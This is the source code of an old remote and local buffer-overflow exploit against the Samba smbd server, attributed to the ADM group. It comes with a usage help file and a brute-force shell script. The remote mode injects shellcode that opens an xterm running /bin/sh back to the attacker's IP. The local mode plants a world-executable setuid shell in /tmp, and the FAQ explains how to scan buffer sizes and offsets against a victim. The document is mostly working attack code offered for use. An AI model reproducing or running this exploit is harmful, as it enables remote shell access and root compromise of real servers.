ADMultimateSMBsploit
92fe9ece9ee952039f23cb9b7dfce17aeaef6bbddf09c009b54fa2b0997b8e62
/* ___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''
ADMkillsamba ver 0.2 argh ADM back again ! :)))
whats new ?: i have include a krad help & a verry Fast utility for found
smbserver <note: u can use it for found imapd :)> ; a script shell for make
brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */
/* ADMkillsamba-v0.2.c */
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";
void main(int argc, char *argv[]) {
FILE *filez;
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];
char bufferz[255];
char ipz[40];
char myipz[40];
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
int *ret;
unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
unsigned char arg1[50];
int i;
bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);
if(argc <3){
printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
printf(" HaVe Fun\n");
exit(0);
}
if(*(argv[1]+0)=='R'){
printf("Remote sploit\n");
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) offset = atoi(argv[6]);
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[3]);
}
if(*(argv[1]+0)=='L'){
printf("Local sploit\n");
strcpy(shellcode,localshell);
strcpy(netbios_name,argv[2]);
strcpy(ipz,"127.0.0.1");
filez=fopen("/tmp/IK","w+");
fprintf(filez,"#!/bin/sh\n");
fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
fflush(filez);
fclose(filez);
system("chmod a+x /tmp/IK");
}
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);
addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
}
--------------------------------small help------------------------------------
ADMsmb HELP v0.1
( a krad help =) )
Q: why the sploit gimme alwais the msg Broken pipe ???
A: ok diz msg appear when you have not the good buffer_size/offset value
yes diz param change on every machine ! u must found it! for that try
a brutal force on the buff/offset see the script :)
-------------------------------Brutal Force-----------------------------------
#!/bin/sh
declare -i D
declare -i OFF
declare -i try
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------
Q: what is the best param for buff/offst .?
A: first try with diz param buffer=3081 offset=3500 if is dont work try
to change the offset size 1000 at 8000 if he dont run try buff size 3075
at 3090 i know its hard but with experience its simple =)
Q: how to found the buff size ??
A: simple ! launch ADMkillsamba with buff/size=1000 if the srv dont make
a broken pipe the buffer was to small try by step of 100 when the srv
give u a broken pipe ; try to see the precise value ! and make a scan on
it =)
ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100
Q: the offset size ??
A: Scan it :)
PS: if u found a offset & buff/size on a system plz send it i'am gonna make
a list of the most curently buff/size
PPS: if u wanna code a char shell for a other OS mail me !
news: ADM gonna make a home page for diz sploit dont forget to see it for
more helps tips/etc
cya
--------------------------------------------------------------------------------
U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!